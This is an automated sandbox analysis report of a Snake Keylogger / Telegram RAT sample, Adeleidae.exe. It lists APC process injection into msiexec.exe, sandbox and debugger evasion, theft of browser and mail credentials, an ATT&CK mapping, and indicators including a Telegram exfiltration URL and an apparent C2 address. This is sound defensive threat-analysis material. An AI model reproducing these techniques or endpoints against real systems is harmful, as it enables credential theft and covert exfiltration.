Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: Adeleidae.exe, 00000000.00000002.1814352755.0000000000758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Adeleidae.exe	API call chain: ExitProcess graph end node			graph_0-2837
Source: C:\Users\user\Desktop\Adeleidae.exe	API call chain: ExitProcess graph end node			graph_0-3017

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_047FF288 LdrInitializeThunk,LdrInitializeThunk,

1_2_047FF288

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3CF0000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Adeleidae.exe

Code function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406077

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3023161132.0000000025771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 8056, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match

File source: 00000006.00000002.3023161132.0000000025878000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3023161132.0000000025771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 8056, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Virtualization/Sandbox Evasion	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Adeleidae.exe	13%	ReversingLabs
Adeleidae.exe	22%	Virustotal		Browse
Adeleidae.exe	100%	Avira	HEUR/AGEN.1333748

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe	100%	Avira	HEUR/AGEN.1333748
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe	13%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
drive.google.com	0%	Virustotal	Browse
drive.usercontent.google.com	1%	Virustotal	Browse
reallyfreegeoip.org	0%	Virustotal	Browse
smtp.ionos.es	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.185.78	true	false	0%, Virustotal, Browse	unknown
drive.usercontent.google.com	142.250.186.161	true	false	1%, Virustotal, Browse	unknown
reallyfreegeoip.org	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
smtp.ionos.es	213.165.67.102	true	true	1%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true		unknown
checkip.dyndns.com	132.226.8.169	true	false		unknown
checkip.dyndns.org	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2024/10/2024%20/%2018:06:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.71	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://drive.usercontent.google.com/(	msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EBA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.office.com/	msiexec.exe, 00000006.00000002.3023161132.0000000025954000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com/o	msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.microsoft.co	powershell.exe, 00000001.00000002.2429767028.00000000075B0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/lB	msiexec.exe, 00000006.00000002.3023161132.000000002595E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.usercontent.google.com/	msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	msiexec.exe, 00000006.00000002.3024547427.0000000026896000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000268BD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Adeleidae.exe, 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Adeleidae.exe, 00000000.00000000.1748229862.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	msiexec.exe, 00000006.00000002.3024547427.0000000026896000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000268BD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://smtp.ionos.es	msiexec.exe, 00000006.00000002.3023161132.00000000258F0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000006.00000002.3023161132.0000000025923000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.mi	powershell.exe, 00000001.00000002.2429767028.00000000075B0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drive.google.com/A	msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com	msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20a	msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://51.38.247.67:8081/_send_.php?L	msiexec.exe, 00000006.00000002.3023161132.00000000258F0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2424947064.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com/	msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.71$	msiexec.exe, 00000006.00000002.3023161132.00000000257E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.000000002582D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	msiexec.exe, 00000006.00000002.3024547427.000000002684F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.0000000026ACA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269F3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000006.00000002.3023161132.000000002592D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com/F	msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EBA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.00000000257BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.000000002582D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://apis.google.com	msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	msiexec.exe, 00000006.00000002.3024547427.000000002684F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.0000000026ACA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269F3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2424947064.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000006.00000002.3023161132.00000000257BD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
142.250.185.78	drive.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
213.165.67.102	smtp.ionos.es	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
142.250.186.161	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1540728
Start date and time:	2024-10-24 03:38:24 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Adeleidae.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/19@6/6
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 153 Number of non-executed functions: 90
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7424 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:39:28	API Interceptor	43x Sleep call for process: powershell.exe modified
21:40:52	API Interceptor	327x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	FINAL SHIPPING DOCS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	rtransferencia-.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Q110450 SV51179-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	z547GEViTFyfCZdLZP.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	TicariXHesapXXzetiniz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	MT103-539 PAYMENT (1).docx.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PaymentXConfirmationXcopy.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
